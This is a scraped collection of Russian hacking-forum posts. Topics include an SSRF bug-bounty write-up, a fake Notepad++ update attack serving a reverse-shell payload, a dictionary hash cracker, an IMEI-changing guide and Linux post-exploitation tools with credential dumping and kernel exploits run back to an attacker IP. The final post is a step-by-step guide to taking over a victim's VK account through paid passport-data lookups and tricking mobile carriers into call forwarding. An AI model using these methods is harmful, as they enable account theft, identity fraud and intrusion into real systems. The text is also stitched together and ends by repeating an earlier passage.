из-за отсутствия подробных ошибок. В итоге, сосредоточившись на ключевой цели, пришлось обратиться к NIPRnet. Был задействован Burp Сollaborator (это сервер postswigger), чтобы узнать, какая информация пришла на контролируемый сервер. Исходя из того, какие http-заголовки были в запросах, было отмечено, что они пропускали конфиденциальную информацию, включая заголовок «X-Forwarded-For», который сливался во внутренний IP-адрес. Закончив запрашивать все IP адреса, которые взаимодействовали со ссылкой на сервер Burp Collaborator, важно было проверить, произошли ли хоть малейшие изменения. Однако ничего не произошло. В этот момент также было обнаружено, что прочитать метаданные AWS не оказалось возможным, хотя запрос IP-адреса и серверов DoD-сети выполнился, как и на первом веб-сайте. Все же, специалист поспешил сообщить команде hackerone о своих находках, после чего Impact обоих отчетов увеличился до отметки «критично». Позже, пересматривая обе SSRF-уязвимости с низким Impact, обнаруженные ранее и зарепорченные не так давно, было принято решение привлечь внимание и к ним в надежде на увеличение оценки угрозы для безопасности. Эти две уязвимости заставляют использовать фильтр веб-приложений, злоупотребляя HTTP-подключением для запроса определенных IP-адресов. Запрос был довольно простым: нужно всего лишь отправить CONNECT IP, после чего можно перечислять службы DoD с помощью этого метода. Также оказалось возможным злоупотреблять заголовком хоста для выполнения запроса на аутентификацию для внутреннего IP или внешнего IP, например: militarywebsite.mil@internal_IP. Вернувшись к старым SSRF, было обнаружено, что можно выполнить Blind SSRF, запрашивая внутренние IP-адреса или службы, в результате чего страница сообщала, что истекло время ожидания, произошла ошибка SSL и др. После просьбы о пересмотре репорта уровень Impact был повышен до среднего. Лайфхаки для эксплуатации SSRF Во время исследований вышеперечисленных эксплойтов, специалист обнаружил, что в некоторых случаях эксплуатации возникает ошибка стека и утечка различной конфиденциальной информации. Причину, по которой это происходит, в конечном итоге так и не удалось найти. Обычно увидеть утечку информации можно, используя неполный HTTP-заголовок, например http:// или http://[::]. Конфиденциальная информация включает в себя IP-адрес базы данных, версию базы данных, используемые плагины, ОС, архитектуру ОС, etc. Также иногда на веб-сайте есть ссылки на другие экземпляры Altassian. Это открылось во время тестирования одного известного ресурса. Там был установлен Altassian на другом поддомене (из меню), на котором перечислены прочие сайты с Altassian, где присутствует данная уязвимость. Заключение Две устаревших версии Jira были уязвимы для вышеупомянутых эксплойтов SSRF. Они нужны для того, чтобы предоставлять доступ ко внутренним службам и сетям DoD. Было также обнаружено, что другой эксплуатируемый сайт позволял злоумышленнику просматривать конфиденциальный контент метаданных на сервисах AWS, содержащих идентификатор учетной записи, частный IP-адрес и другую конфиденциальную информацию, связанную с сервером и учетной записью. Злоумышленник мог использовать эти уязвимые веб-сайты для доступа ко внутренним AWS Министерства обороны. Хакер также мог использовать ресурсы для доступа к внутренней локальной сети Министерства обороны США. Это вполне могло бы привести к компрометации конфиденциальных данных и возможному сбою критически важных сервисов. Bug Bounty Министерства обороны имеет большой scope, в котором можно искать уязвимости. К тому же, они готовы работать с исследователями безопасности. В этой статье опубликованы наиболее распространенные проблемы и уникальные уязвимости, найденные в DoD. И помните: ищем уязвимости, чтобы устранять их, а не использовать в своих целях. Если вы хотите построить карьеру в области информационной безопасности, следуйте этому правилу.
-
- уязвимость
- эксплойт
-
(and 8 more)
Tagged with:
-
В данной статье я хочу поговорить о теме которая меня давно интересует, а именно фейковое обновлении ПО. Мне вообще интересна тема MITM а в частности как проводить атаки внутри сети. Одним из векторов атаки является то самое фейковое обновление ПО. Примерно год назад мне попалась на глаза программа evilgrade, сразу загорелся желанием разобраться как она работает. Попробовал разобрать с наскоку но что то пошло не так и я забил Сегодня я сново вернулся к этой теме и в этот раз я добился результат. Оговорю сразу, я не даю вам четкие инструкции как вам провести данную атаку или написать код чтобы автоматизировать процесс, я опишу методологию того как это происходит и покажу пример который наглядно покажет о чем идет речь. Суть данного материала показать как работает данная атака на примитивном уровне. Давайте выйдем за рамки скрипт-кидди и повысим свой уровень знаний в данной области Бездумно использовать готовый софт могут все, а понять как он работает далеко не многие. Теория: Прежде чем углубиться в атаку давайте разберем механизм обновление ПО. Этапы обновление ПО: Отправляем на сервер запрос для проверки обновления (это может делать как сама программа в автоматическом режиме так и выполнен запрос в ручную) Получаем ответ от сервера Обработка ответа (если обновление есть то устанавливаем если нет то сообщаем о том что программа не имеет обновлений)После того как у нас сформировалось понимание того как проходит процесс обновление ПО мы можем сформировать этапы атаки. Этапы проведения атаки: Определить запрос отправленный на сервер обновления Посмотреть ответ который прислала сервер Понимаем свой сервер Реализовать атаку типа DNS Spoofing на адрес сервера обновлений Сформировать свой ответ на основе полученного ответа в пункте 2Когда этапы атаки обозначены можно приступить к реализации. Пока что на уровне теории можете не особо понятно о чем идет речь но скоро мы перейдем к примеру который наглядно покажет что к чему. Возьмем для примера программу Notepad++, она идеально подойдет для того чтобы наглядно показать данный вектор атаки. Практика: Для того чтобы мы могли выполнить все этапы атаки нам понадобиться следующие программы: Notepad++XAMPPWiresharkНачнем с установки Notepad++. После того как мы установили программу надо проверить ее обновление. Находим знак ? нажимаем на него в выпадающем меню выбираем “Обновить Notepad++”. Появляется окно которое нам предлагает скачать обновление. Это нам как раз и надо. Нажимаем отмена, открываем Wireshark. Выбираем сетевой адаптер (тут мог выразиться не точно). Выставляем фильтр HTTP. Повторяем процесс запроса но обновления ждем пару секунд останавливаем Wireshark. И начинаем смотреть перехваченные пакеты. В поле info мы можем заметить что есть GET запрос с URL который начинается на update. Просмотров данный запрос более детально мы видим Full request который ведет на URL notepad-plus-plus.org. Чтобы убедиться что это то что нам надо давайте перейдем на полный URL http://notepad-plus-plus.org/update/getDownloadUrl.php?version=6.0. В ответ мы получим XML который говорит нам о том что есть новое обновление. yes 7.5.9 http://notepad-plus-plus.org/repository/7.x/7.5.9/npp.7.5.9.Installer.exe На этом этапе у нас есть мы нашли интересующий нас запрос и узнали какой требуются ответ чтобы его распознала программа. На этом сбор данных закончен приступим к атаке. Так как тест проводиться в лабораторных условия я некоторые моменты упростил а именно DNS Spoofing и поднятие сервера в локальной сети. Третий и четвертый пункт будут проводиться на атакуемой машине но это не столь важно так как не вредит чистоте теста. Устанавливаем XAMPP. Включаем Apache. Переходим в каталог где лежит сайт по умолчанию C:\xampp\htdocs. Создаем там две директории update и repository. Каталог update обязателен так как он есть в URL который запрашивает обновление там будет лежать файл getDownloadUrl.php. Директория repository не обязателен так как мы сами указываем откуда загружаться payload в XML который будем отдавать в ответ на запрос но для красоты и порядка положим именно туда нашу пользовательскую нагрузку. Переходим в каталог update и создаем файл getDownloadUrl.php со следующим содержанием. <?php header('Content-type: text/xml'); $xml = yes 7.5.9 http://notepad-plus-plus.org/repository/payload.exe XML; echo $xml; Данный код выводит все тот же XML который мы получили ранения с одним изменением. В тэг Location мы установили свой путь к файлу с payload который находиться в директории repository. Payload я создал на Kali. Пример как это делать можно посмотреть в статье [Metasploit] устанавливаем обратное TCP соединение через ngrok. После того как вы получили exe файл положите его в каталог repository. Теперь давайте перейдем по адресу http://localhost/repository/ и убедимся что там лежит на payload файла. А также проверим отдается ли наш сконфигурированный XML по адресу http://localhost/update/getDownloadUrl.php. Если у вас все сходиться с примерами на скриншотах тогда вы делаете все правильно. Осталось совсем немного) а именно надо заставить идти запросы на наш сервер. Тут мы можем прибегнуть к DNS Spoofing но как я говорил ранее мы упростим данный шаг. Идем в каталог etc который находиться по пути C:\Windows\System32\drivers\etc и добавляем в конец файл hosts 127.0.0.1 notepad-plus-plus.org. Тем самым мы говорим нашей системе чтобы все запросы которые идут на notepad-plus-plus.org шли на locolhost. На этом подготовка закончена осталось проверить. Идем в Notepad++ запускаем проверку обновления. Соглашаемся скачать обновления. После того как обновление скачается появиться еще одно окно. Соглашаемся. Notepad++ закроется а наш payload выполнится. Вот мы и получили контроль над машиной в локальной сети незаметно для атакуемого пользователя. Я надеюсь что статья была полезной и вы вынесли для себя что то новое. Данный вид атаки сработает далеко не со всеми программами. Но с какой то частью точно. Как поступить с полученными знаниями зависит только от вас.
-
Привет, всем, из названия статьи вы уже узнали о чем пойдет речь, но все я же скажу немного поподробнее. mXtract – это программа с открытым исходным кодом для Linux, с помощью нее можно проводить анализ и создавать дампы памяти. Данная программа была создана для пентестов, чтобы находить в памяти закрытые ключи и пароли, используя при этом словарь регулярных выражений. Чаще всего в дистрибутивах Линукс можно получать права на получения содержимого памяти процесса, а это значит, что хакеры могут заполучить данные, которые будут прочитаны ими как открытая книга. Итак, небольшой список того, что умеет данный инструмент: Ввод регулярных выраженийУдобный вывод информацииМожно проводить массовые сканированияУстановление определенной точки сканированияДамп памяти, который можно обработаться сразу же с помощью иных утилит. Установка Компиляция: g++ -std=c++11 -O2 src/main.cpp -o mxtract Список команд: -v Enable Verbose Output -s Suppress Banner -h Help -c suppress colored output -r= Regex DB -a Scan all memory ranges not just heap/stack -w Write raw memory to file Default directory is pid/ -o Write regex output to file -d= Custom Ouput Directory -p= Specify single pid to scan Either -r= or -w needed
-
- mxtract
- инструмент
- (and 10 more)
-
Эта подборка включает бесплатные игры, которые созданы не только для новичков, но и для профессиональных разработчиков, желающих в интересной и увлекательной форме освоить JavaScript, Java, Python, PHP, C# и многие другие современные языки. Мы отобрали 21 самый интересный сайт, обучающий программированию во время игры, более чем из 200 подобных проектов. CodinGame На CodinGame с помощью написания кода и создания собственного «искусственного интеллекта» вам предстоит решить самые разнообразные и весёлые проблемы. Сайт поддерживает все языки программирования. Code Combat CodeCombat — это платформа для студентов и школьников, позволяющая изучить компьютерные науки, играя в настоящие игры. Красочная анимация и интересный сюжет, кланы, взаимодействие с тысячами других игроков по всему миру — вот что вам предстоит увидеть. Поддерживаются такие языки, как Java, JavaScript, Python, Lua, CoffeeScript. Имеется русская локализация. Ruby Warrior Если вы хотите изучить Ruby, то Ruby Warrior — то, что вам нужно. Есть два уровня сложности, соответствующих вашим навыкам. Для сохранения своего прогресса придётся залогиниться через Facebook. Check iO Check iO — это браузерная игра в жанре «Приключение», которая научит вас программировать на Python. Code Hunt В игре Code Hunt вы, охотник за кодом, исправляете код, чтобы он возвращал нужный результат. Для прохождения доступны 14 уровней, в каждом из которых есть по несколько заданий. Игра подойдёт тем, кто хочет изучить Java или C#. Vim Adventures Давно хотели собраться с силами и выучить Vim полностью? Игра Vim Adventures поможет сделать это в наиболее весёлой и интерактивной форме. Robocode Любите битвы роботов? Тогда игра Robocode для вас. Вы научитесь программировать путём создания боевых роботов-танков на Java или .NET. Когда вы создадите робота, на экране в реальном времени начнётся битва. Cyber DoJo Cyber Dojo — это пространство, где разработчики могут собираться вместе и изучать такие языки программирования, как JavaScript, Java, Python, PHP, Ruby и многие другие. Репозиторий проекта на GitHub. FightCode Цель FightCode довольно проста: создайте робота, который победит роботов других игроков. Как создать робота? Напишите его на JavaScript. Например, вы можете использовать метод .rotateCannon() для поворота пушки робота на определённую величину, когда происходит какое-то событие. Прежде чем создавать своего робота, стоит прочитать документацию. Code Monkey В этой игре вы научитесь не только кодить, но и ловить бананы! На западе учителя часто используют Code Monkey для уроков программирования у детей. Обучают программировать на CoffeScript и Python. Elevator Saga В Elevator Saga вам предстоит управлять настоящим лифтом с помощью JavaScript, разгадывая различные задачки. Например, первое задание — доставить лифтом 15 человек меньше чем за 60 секунд. Ссылка на Open Source репозиторий. Codewars Улучшайте свои навыки программирования совместно с другими людьми через решение реальных IT-проблем и задач на Codewars. Поддерживает JavaScript, C#, Java, Python и другие языки. Git Game Git Game — консольная игра, пройдя которую вы полностью овладеете этой системой контроля версий. Суть игры заключается в использовании различных команд, чтобы найти подсказки для решения разных загадок. Hacker На Hacker.org вы найдете набор пазлов, тестов, викторин и головоломок, которые потребуют всех ваших хакерских навыков. К концу игры вы даже научитесь взламывать настоящее шифрование! Hex Invaders В этой версии классической аркады на мир нападают три инопланетянина разных цветов. Для того чтобы спасти человечество, игрок должен быстро переводить шестнадцатеричное значение цвета на человеческий язык и сбивать пришельцев. Flexbox Froggy Логическая игра, в которой вы должны помочь цветным лягушкам добраться до их любимых кувшинок. Делать это вам нужно будет при помощи CSS Flexbox, что очень поможет развить навыки вёрстки. Подсказки покажут, как лучше решить каждую задачу, но финальное решение остаётся за вами — способов решения всегда несколько. Pixactly Pixactly — это простая по виду, но не по содержанию игра. Вам даётся местоположение двух пикселей, а вы должны нарисовать по этим координатам прямоугольник. CSS Diner Отличная игра для знакомства с CSS-селекторами. Игроку даётся стол с посудой, заданный анимированной HTML-формой, и конкретный предмет или предметы, которые нужно взять со стола. Изучено будет всё, от основ до ~ и :first-child. Flexbox Defense Классический «tower defense» со вкусом CSS — все башни и ловушки нужно размещать при помощи гибкой вёрстки. Игра состоит из 12 уровней, которые потребуют от вас вспомнить все тонкости системы Flexbox. Untrusted Untrusted — это мета-JavaScript-адвенчура, в которой вы играете за персонажа по имени Dr. Eval — символ @, который может изменять окружающий мир, модифицируя его исходный код (ух, прям Матрица ? ). Игроку предоставляются функции, инициализирующие каждый уровень, и API, с помощью которого нужно прокладывать путь к выходу из уровня. Dungeons & Developers Дерево магических навыков, но магия эта — не льда и огня, а веб-разработки. Отмечайте свои знания CSS, HTML и JavaScript и следите за продвижением к званию Мастера.
-
IMEI – это уникальный номер, который присваивается каждому выпущенному сотовому телефону, планшету или модему. Он идентифицирует устройство и не повторяется среди других устройств. Многие пользователи интересуются, как можно самостоятельно поменять эту комбинацию символов. В этой статье канал HackNet | Labyrinths расскажет вам обо всех доступных методах смены IMEI на Андроиде. Поехали: Что такое IMEI и зачем он нуженIMEI – это цифровая комбинация, уникальная для каждого мобильного устройства. С его помощью можно отследить и заблокировать телефон или планшет. Цель такой идентификации – защита техники потребителя от возможной кражи. Такое средство безопасности поможет в кратчайшие сроки отследить и найти похищенное устройство. IMEI применяется в следующих ситуациях:Если злоумышленники похитили ваш смартфон, вы сможете дистанционно заблокировать доступ к нему. Для этого потребуется немедленно позвонить своему оператору связи и предоставить информацию о потере, указав индивидуальный номер устройства. Специалисты произведут блокировку телефона в пределах покрытия своей сети и внесут его в базу данных, а также сообщат другим поставщикам услуг мобильной связи о выполнении данных действий;Набор таких цифр говорит о многом. В этом кодовом обозначении спрятаны: модель (первые восемь цифр), происхождение и марка аппарата, производитель (следующие шесть цифр);IMEI можно использовать для отслеживания местонахождения смартфона, но для этого потребуется подписаться на соответствующую службу. При этом пользователь может осуществлять слежение с другой симки.Проверка ImeiПрежде чем настроить IMEI, нужно узнать установленный на данный момент номер. Выполнить это довольно просто: Для всех устройств с операционной системой Андроид потребуется набрать команду *#06# и нажать на кнопку вызова. После выполнения этих действий моментально выскочит окошко, в котором будет указан действующий номер. Также можно перейти в раздел настроек на своем смартфоне и в самом конце списка открыть вкладку «О приложении». Откроется окно с подробной информацией об устройстве, в котором можно посмотреть IMEI номер. Изменение идентификатораСуществует несколько методик восстановления и смены идентификационного номера: При помощи инженерного меню. Такое меню предусмотрено на всех мобильных устройствах на платформе Android. Данные тут хранятся в энергонезависимой памяти NVRAM;При помощи сторонних программ и приложений. Для таких целей разработано специальное ПО, чтобы писать новые номера. Через инженерное менюИнженерное меню является скрытой функцией смартфона и предназначено для проведения тестирований и настроек. Начать работу через инженерное меню можно, использовав специальные USSD команды. Комбинация клавиш вводится на стандартной панели набора телефонных номеров и отличается у каждого производителя. На различных интернет-ресурсах можно узнать комбинацию для определенной марки телефона. Например: устройствам HTC соответствует комбинация: *#*#8255#*#*; Samsung Galaxy: *#*#4636#*#*; ZTE и Мейзу: *983*07#; планшет с процессором Nvidia (Xiaomi): *#*#6484#*#*; Huawei: *#*#2846589#*#*, *#*#3646633#*#*. Как только будет введена команда, откроется соответствующее меню. Заблудиться в нем очень легко. Поэтому далее ориентируйтесь на следующий алгоритм: В главном окне откройте панель «Connectivity». Кликните на пункт «CDS information», затем «Radio Information». Выберите строчку «Phone 1». Откроется новое окно, в котором первым пунктом будет отмечен действующий на данный момент IMEI. Нужно ввести в поле команд следующее: AT+EGMR=1,7, «нужный цифровой идентификатор». Выполнить команду, нажав на кнопку «Send at command». Внимание! На разных моделях смартфонов путь к нужным настройкам может варьироваться. Для того чтобы изменения вступили в силу, потребуется произвести перезагрузку мобильного устройства. После перезагрузки проверьте установленный IMEI, введя комбинацию клавиш *#06# на клавиатуре. Смена при помощи приложенийЕще одним способом замены идентификатора является применения специализированных программ. Но для их использования необходим статус и права суперпользователя в телефоне. Чтобы активировать данный вид прав, потребуется установить приложение Farmarootpro5.1 на смартфон. Опять же, на разных марках телефонов Root-права получают по-разному. Мы опишем общую инструкцию, которая подойдет далеко не всем: Установите и запустите Farmaroot (в Google Play программы нет, поэтому ее нужно искать в сети). В главном меню тапните на «InstallSuperSU». Указываем способ рутирования (выбираем из имеющихся). Далее перезапустите гаджет. Теперь, когда у вас есть особые права, установите одну из этих программ: Mobileuncle или Xposed IMEI Changer. Порядок работы с приложением Mobileuncle следующий: Установите и запустите приложение Xposed framework. Откройте раздел инженерного режима, в котором выберите инженерное меню. Далее, как и в предыдущей методике, переходим во вкладку «Connectivity» — «CDS information». Прописываем новое цифровое значение идентификатора -AT+EGMR=1,7, «новое значение» и выполняем перезагрузку системы. Проверьте, установился ли новый imei, набрав соответствующую комбинацию клавиш. Данная программа предназначена для работы с процессорами серии MTK. После успешно выполненных действий рекомендуется сбросить Root-права и удалить приложение Farmaroot для корректной работы терминала. Алгоритм работы с утилитой XPOSED IMEI Changer: Получите права суперпользователя, как в предыдущей методике. Запустите утилиту и откройте меню «Modules». Отметьте параметр IMEI Changer и перезагрузите мобильное устройство. Затем откройте приложение изменения идентификатора. В пункте «New IMEI No» введите новое значение персонального кода и подтвердите выполненные действия. Перезагрузите гаджет и проверьте результат. В случае неудачи и ввода неверного значения, повторите еще раз, но установив другое цифровое значение серийного номера. Такой способ идеально подходит для терминалов с процессором Snapdragon (Самсунг) от фирмы Qualcomm. Новые числовые данные можно подобрать при помощи специального генератора. Такие приложения находятся в открытом доступе. Также существуют онлайн-версии, в которых можно пользоваться генератором, моментально подбирая новую комбинацию.Внимание! Процедуры замены IMEI вносят серьёзные изменения в свойства аппарата, поэтому не рекомендуется выполнять такие действия с гарантийными телефонами. А изменение или удаление идентификатора с телефона без ведома владельца является уголовно наказуемым деянием. Написанная информация в статье несет исключительно ознакомительный характер, чтобы дать возможность пользователю обезопасить себя. Автор не несет ответсвенности за использование данной информации личных корыстных целях.
-
В этой статье мы разберём код программы на Python 3.6 с использованием BruteForce для взлома криптографической хеш-функции. Всё, что нам необходимо знать, чтобы сделать перебор по словарю, – это алгоритм хеш-функции, с помощью которого зашифрована информация (в нашем случае – простой текст). В программе будем использовать три алгоритма из библиотеки hashlib: md5, sha256, sha512. Вы можете усовершенствовать код, добавив в него другие алгоритмы, представленные в hashlib. Работа с командной строкой Чтобы вызвать программу, перейдём в папку, где лежит исходник (main.py), словарь (будем использовать rockyou.txt) и файл с хеш-функцией (назовём его hash.txt). Аргументы командной строки имеют следующий вид: Нулевой аргумент (необязателен)Название алгоритма шифрованияИмя файла с хеш-функцией (hash.txt)Имя словаря (rockyou.txt)К примеру, вызов программы с использованием алгоритма md5 будет выглядеть так: ./main.py md5 hash.txt rockyou.txt Разбираем код для взлома хеш-функции Код небольшой, поэтому я помещу его здесь, а дальше буду разбирать по строкам. # Examples: # md5: fc5e038d38a57032085441e7fe7010b0 = helloworld # sha256: 3fc9b689459d738f8c88a3a48aa9e33542016b7a4052e001aaa536fca74813cb = something # sha512: 9b71d224bd62f3785d96d46ad3ea3d73319bfbc2890caadae2dff72519673ca72323c3d99ba5c11d7c7acc6e14b8c5da0c4663475c2e5c3adef46f73bcdec043 = hello from sys import argv from hashlib import sha256, sha512, md5 # chmod +x main.py # ./main.py md5 hash.txt rockyou.txt line = "----------------------------------" try: hashAlgr,fileHash,fileDict = argv[1],argv[2],argv[3] except IndexError: print("Error: Arguments!") raise SystemExit with open(fileHash) as file: hashFunc = file.read() hashFunc = hashFunc.replace('\n','') def generator(string): for word in string: passwd = word.replace('\n','') if encrypt(passwd) == hashFunc: yield line +"\n[True]: "+passwd return else: yield "[False]: "+passwd def encrypt(string): passwd = string.encode() if hashAlgr == "md5": signature = md5(passwd).hexdigest() elif hashAlgr == "sha256": signature = sha256(passwd).hexdigest() elif hashAlgr == "sha512": signature = sha512(passwd).hexdigest() else: raise SystemExit return signature print(line) with open(fileDict, errors = "ignore") as dictionary: for password in generator(dictionary): print(password) print(line) Первым делом из библиотеки sys импортируем argv, чтобы работать с программой из командной строки. Затем из библиотеки hashlib импортируем алгоритмы, которые будем использовать – sha256, sha512, md5 (строки 6 и 7). В строке 12 добавляем линию, которая будет отображаться при выводе найденной фразы (сделано для красоты). В строках 14-18 инициализируем аргументы и проверяем их кол-во. Если при вводе в командную строку не обнаруживается какой-либо аргумент, выводится ошибка, а программа прекращает работу. Если не вывелось никакой ошибки, то на строках 20-22 открываем файл с хеш-функцией (hash.txt) и удаляем оттуда перенос строки – \n. Далее идёт функция generator: она осуществляет перебор ключей по словарю. В строке 28 убираем у слова перенос строки \n и записываем в переменную passwd. Затем сравниваем зашифрованную с помощью функции encrypt строку passwd с хеш-функцией, записанной в hash.txt. Если значения совпадают, возвращаем из функции generator строку [True] и найденный ключ. Если нет, то возвращаем [False] и текущий ключ. Разберём функцию encrypt. В строке 34 преобразуем переданный passwd в юникод. Чтобы понять, для чего это делается, смотрите документацию к библиотеке hashlib, которую я прикрепил в начале статьи. В строках 35, 37 и 39 сравниваем аргумент hashAlgr, полученный из командной строки с имеющимися алгоритмами. Если не находится совпадение, программа завершается. Если аргумент соответствует одному из наших алгоритмов, то шифруем passwd с помощью алгоритма, преобразовываем в шестнадцатиричную систему и возвращаем его. Рассмотрим заключительный фрагмент кода. В строке 45 мы открываем словарь. Также при открытии игнорируем ошибки. Далее просто перебираем пароли через функцию generator. Заключение Логика программы довольно проста. Если вы хорошо разбираетесь в программировании, можете с лёгкостью усовершенствовать её, добавив несколько алгоритмов шифрования, например, blake2b или алгоритм, использующийся в OpenSSL. Также возможно создание посимвольного перебора для фиксированной длины, однако такой способ будет работать гораздо дольше, чем перебор по словарю, но зато шанс взломать криптографическую хеш-функцию будет гораздо выше. Написанная информация в статье несет исключительно ознакомительный характер, чтобы дать возможность пользователю обезопасить себя. Автор не несет ответсвенности за использование данной информации личных корыстных целях.
-
Друзья, сегодня минимум слов, максимум дела! В материале ниже будем смотреть инструменты пост-эксплуатации для систем Linux! Что можно сделать после того как ты уже прорвался во внутренний периметр сети, или, как на CTF-соревнованиях, когда ты получил доступ к уязвимой тачке и готов броситься в бой дальше! Пост-эксплуатация в практике пен-теста Пост-эксплуатация (англ. post-explotation) — это то, что можно сделать с целевой системой после того, как удалось найти уязвимость и выполнить какой-то участок кода на целевой системе. Так же под этим термином понимается один из этапов взлома компьютерных систем (фаза) позволяющая собирать дальнейшую информацию о целевой системе, получить дальнейший доступ к сети и хранящимся данным. Фаза пост-эксплуатации позволяет идентифицировать такие вещи, как дополнительные подсети, маршрутизаторы, названия серверов, сетевых служб и установленных приложений. Фазы (этапы) проведения тестирования на проникновение Основные паттерны, по которым работают злоумышленники на этапе пост-эксплуатации: получить доступ на выполнение произвольного кода\команд изучение данных, хранящихся на сервере перехват данных, которых нет на системе сейчас, но они могут появиться в будущем организация перманентного доступа к целевой системе эскалация привилегий до уровня системы для непривилегированной учетной записи Дополнительно, хакер может получать информацию о скомпрометированной системе, анализируя следующие параметры: конфигурацию системы (логин и пароль к БД в исходных кодах) конфигурацию веб-сервера (например, httpd.conf, .htaccess) исходные коды приложения (поиск уязвимостей, анализируя логику приложения) доступы к окружению (находясь внутри сети может быть проще попасть на соседние сервера и изолированные сегменты подсети) базы данных (аутентификационная информация к другим системам, хранящаяся в них Обзор инструментов пост-эксплуатации Мы же в материале сделаем акцент на рассмотрение инструментов пост-эксплуатации исключительно под Linux-системы. 1. PXEenum — полное перечисление всего что есть в системе Основной задачей данного скрипта является функция перечисления (англ. Enumeration). Он вытаскивает всю доступную информацию о системе. Данный скрипт создан, если не сказать, что создан для лентяев то для тех, кто ценит свое время. Для запуска он не требует прав root’а, работает в стандартном терминале. # wget https://raw.githubus...ster/PXEnume.sh Установка: # git clone https://github.com/s...uong/PXEnum.git # cd PXEnum/ # chmod +x PXEnum.sh # bash PXEnum.sh 2. MIDA Multitool — палим систему по взрослому Другой интересный инструмент MIDA Multitool созданный на базе менее именитых собратьев SysEnum и RootHelper, но включающий в себя гораздо больший функционал. По воле разработчика функционал MIDA Multitool включает в себя отдельные функции своих предшественников под одним капотом, а именно: SysEnum — Bash скрипт, предназначенный для получения основной информацию о системе, включая, но не ограничиваясь следующими данными — текущий пользователь, IP-конфигурация, таблицы ARP, запущенные процессы и т.д. Roothelper — призван помочь в процессе эскалации привилегий в системе, которая была скомпрометирована, путем выполнения ряда перечислений и использования доверительных сценариев. Устанавливаем скрипт в систему с github: # git clone https://github.com/N...h-Kit-Multitool # cd Bash-Kit-Multitool # chmod +x bashkit.sh Запускаем скрипт: # /.bashkit.sh Дело сделано! Можно запускать в системе! 3. MimiPenguin — тырим пароли без зазрения совести Очень хорошо известный скрипт в узких кругах пен-тестеров под названием MimiPenguin. основной задачей утилиты служит сброса пароля на вход в систему от текущего пользователя Linux. Если такое сравнение возможно то это аналог утилиты mimikatz для дампа пароля в Windows системах (о ней мы уже рассказывали в одной из наших прошлых статей) Кроме того, MimiPenguin поддерживает такие приложения, как VSFTPd (активные подключения клиента FTP), популярнейший web-сервер Apache2 (активные/старые сеансы HTTP BASIC AUTH, но для этого требуется Gcore) и openssh-сервер (активные подключения SSH с использованием команды sudo). И вообще необходимо сказать, что MimiPenguin часто становится частью эксплойтов под Linux. Устанавливаем MimiPenguin забирая его с репозитория GitHub: # git clone https://github.com/h...gal/mimipenguin # cd mimipenguin # ls –a # chmod +x mimipenguin.sh # ./mimipenguin.sh 4. LARE — ломимся под рута используя баги ядра И напоследок еще один довольно простой скрипт, который помогает с помощью использования известных уязвимостей в ядре ОС получать привилегии root удаленно с атакующей машины. Скрипт использует локальные эксплойты для получения root прав для версий ядра Linux Kernel v2.6-v4.8. Кстати, эта тулза очень часто находит свое применение на пиздатом сертификационном экзамене OSCP. Устанавливаем скрипт в систему: # git clone https://github.com/EnigmaDimitri/LARE && cd LARE # chmod +x LARA.sh # LARE.sh -a Запуск скрипта на целевой машине в сети # LARE.sh -l [Attackers-IP] Запуск на машине с подключением к базе данных эксплойтов на GitHub # LARE.sh -l or ./LARE.sh -l Проверка и защита системы от техник пост-эксплуатации Для обеспечения безопасности системы на предмет пост-эксплуатации, по мимо традиционных вариантов защиты как то установка патчей (security patch) и минимизация привилегий, дополнительно существуют специальные тулзы для проверки системы. Ведь в противовес неправильно сложившегося мнения, к пост-эксплуатации не обязательно ведут только 0-dayили устаревший софт,
-
- инстурмент
- метод
- (and 11 more)
-
Привет, сейчас я расскажу об одном способе взлома странички вк. Если выполнить все действия, то после взлома владелец страницы вряд ли когда-нибудь ее увидит. Сразу хочу сказать, что рассказываю я об этом только в целях повышения вашей же безопасности Часть первая Итак, чтобы начать первые этапы взлома, нам нужно узнать мобильный номер нашей жертвы, как вы это сделаете меня лично не касается. Однако, если номер указан в контактных данных, то можете обрадоваться – вам очень повезло и нужно будет только проверить правдивость информации. Нам нужно перейти на страничку входа вк, после чего нажать кнопочку “Забыли пароль” после чего скопировав тот самый номер мы его вставляем, появится окно где мы должны ввести имя жертвы, которое указало номер. Если все верно, то мы можем переходить на следующий пункт. Если же нет совпадения, то вы должны проявить свои максимальные силы в СИ, это тоже уже другая история. Однако если вам все же не удалось уломать жертву на номер телефона, то можно попробовать узнать с помощью новейших технологий. Для получения номера нам понадобятся: nomer.iologin.stop-list.infoИменно они станут нашими помощниками. Итак, а теперь мы подумает о том, что если номер телефона мы уже заполучили. То после этого сразу че стоит проверить подключена ли к аккаунту 2-х факторная аутентификация. Ведь если после ввода фамилии высветилось сообщение о том, что код отправлен на электронную почту, то можно сделать вывод о том, что она присутствует. А это может занять еще больше времени, ведь для этого нужно будет провести взлом почты. Однако, как мы знаем рядовые пользователи не особо задумываются о безопасности, а это значит, что найти аккаунт без аутентификации будет не так сложно. Часть вторая На этот этап вы должны переходить уже с номером телефона. Итак, первым делом нам нужно найти сервис, который позволит нам узнать какому оператору принадлежит номер. Если на руках у вас имеется номер и зная оператора, нам нужно будет его пробить. Рассказать о пробивщиках и рекламировать их я не буду, однако могу сказать, что цены начинаются от 400 рублей и обычно не переваливают за 2000 рублей. Вам понадобится пробив во всех случаях кроме билайна, потом расскажу почему. Данные пробива нельзя потерять, они нам понадобятся. Отлично, теперь когда у нас есть пробив по номеру, то нам нужно направить в официальную группу оператора, их вы тоже без труда найдете. И после чего начать им рассказывать какую-то страшную историю о том, что вы находитесь где-то далеко от дома и вам нужно подключение переадресации на новый мобильный номер, чтобы всегда можно было связаться на рабочий номер. Это я написал как пример. Включайте фантазию, придумать можно что угодно, главное чтобы было все правдоподобно. Для этого на понадобятся паспортные данные, получим их мы после пробива. Итак, а теперь что на счет билайна. Они не так глупы, ведь могут попросить у вас не только данные паспорта но и ответить на несколько вопросов, например, на какие суммы пополнялся счет, на какие номера происходили звонки и так далее. Поэтому нужно заказывать пробив с этими данными тоже. Или же можете попробовать пополнить счет на небольшую сумму за небольшой промежуток перед связью с операторами. Часть третья Когда мы получили все необходимые этапы, мы можем выходить на финишную прямую. Следующие действия лучше выполнять ночью, в то время когда активность на сайте минимальная. Нам нужно зайти на сайт вк и нажать на кнопку “Збыли пароль” после чего вводим все данные, телефон, фамилия. Вместо кода нам нужно чтобы нам позвонил робот. В звонке он скажет вам код, после чего вы переходите на страничку, изменяете пароль и устанавливаете 2-х факторную аутентификацию. Отлично, все готово! Теперь вы владелец данной страницы и вряд ли ее будет возможно вернуть, как я и говорил в начале. Привет, сейчас я расскажу об одном способе взлома странички вк. Если выполнить все действия, то после взлома владелец страницы 